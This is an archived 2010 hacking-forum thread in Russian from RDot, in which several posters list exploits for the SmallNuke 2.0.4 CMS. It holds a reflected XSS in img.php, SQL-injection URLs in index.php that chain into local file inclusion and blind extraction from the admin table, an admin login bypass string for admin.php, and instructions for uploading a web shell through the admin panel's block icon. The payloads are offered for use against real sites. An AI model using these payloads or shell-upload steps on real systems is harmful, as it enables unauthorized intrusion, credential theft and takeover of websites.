RDot

RDot (https://rdot.org/forum/index.php)
-   Сценарии/CMF/СMS (https://rdot.org/forum/forumdisplay.php?f=15)
-   -   Уязвимости SmallNuke (https://rdot.org/forum/showthread.php?t=162)

t3zo 07.07.2010 11:14

Уязвимости SmallNuke
 
SmallNuke 2.0.4

уязвимый
сценарий img.php
Параметр img_url
47 строка
Код:

<center><a href="javascript:window.close()"><img alt="Click to close this window!" name="LargeImg" src="<?php echo $_GET['img_url']?>" border="0"/></a></center>
sploit
xak/smallnuke/img.php?img_url=[XSS]

(c) t3zo

Grey 07.07.2010 13:18

SmallNuke <= 2.0.4 (Локальный инклуд файлов / Слепая SQL инъекция)

Уязвимость в файле: inc/modules.php

Код:

$sql = "SELECT * FROM ".SN_TABLE_MODULES." WHERE title='$go'";
Данные из запроса подставляются в include()
Фильтрация не достаточная - используется уязвимая функция ereg().

Код:

http://site.com/index.php?go=1%00'+and+1=2+union+select+1,'../robots.txt%00',3,4,5,6,7,8,9,10,11,12--+1
Ну и разумеется инъекцию можно использовать просто как слепую:

Код:

http://site.com/index.php?go=1%00'+and+1=2+union+select+1,'../robots.txt%00',3,4,5,6,7,8,9,10,11,12+from+sn_admins+where+login='grey'--+1
Соответственно если файл инклудится, то запрос выполнен верно, если не подключается - не верно.

2008 © Grey

Pashkela 07.07.2010 15:07

SmallNuke v. 2.0.4 Full (самая скачиваемая) льем шелл из админки:

В админке идем в

Блоки->Выбираем например "Кто на сайте"->Править->Иконка

и льем шелл, файло льется, но в админке не отображается, можно посмотреть на главной странице адрес шелла:

http://s56.radikal.ru/i152/1007/c7/cfcbb0b1ed56.jpg

будет примерно такой:

Код:

http://localhost/snuke/www/images/block/1278503889_wso2.php
копируем шелл, удаляем иконку (или возвращаем на место старую)

BlackFan 09.07.2010 12:00

SmallNuke v. 2.0.4 (Возможно и другие версии)
http://smallnuke.com/index.php?go=Files&in=cat&id=1
"Powered by Smallnuke"

Blind SQL-Inj / Обход авторизации

Уязвимый скрипт: /admin/admin.php


PHP код:

if (isset ($_POST['enter_admin'])) {
   
$admin_name = isset ($_POST['admin_name']) ? substr (str_replace ("\\'""''"str_replace ("'""\'"rtrim (htmlspecialchars (str_replace ("\'""'"trim (strip_tags ($_POST['admin_name'])))), "\\"))), 015) : '';
   
$code_password = isset ($_POST['admin_password']) ? md5 (trim ($_POST['admin_password'])) : '';
   if (
'' == $admin_name || '' == $code_password || md5('') == $code_password) { header ('Location: admin.php'); exit; }
   
$sql "SELECT admin_id, login, password FROM ".SN_TABLE_ADMINS." WHERE login='$admin_name' AND password='$code_password'";
   
$result $db->sql_query ($sql);
   
$row $db->sql_fetchrow ($result);
   if (
$row) { 

Сплоит:
Код:

login: 1\\'or(1)#
pass: любой


Ctacok 13.08.2010 06:46

Цитата:

Сообщение от Pashkela (Сообщение 1307)
SmallNuke v. 2.0.4 Full (самая скачиваемая) льем шелл из админки:

А ты сам пробывал зайти по ссылке? Сразу 403 рубит. Извеняюсь за оффтоп.


Часовой пояс GMT +3, время: 11:00.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot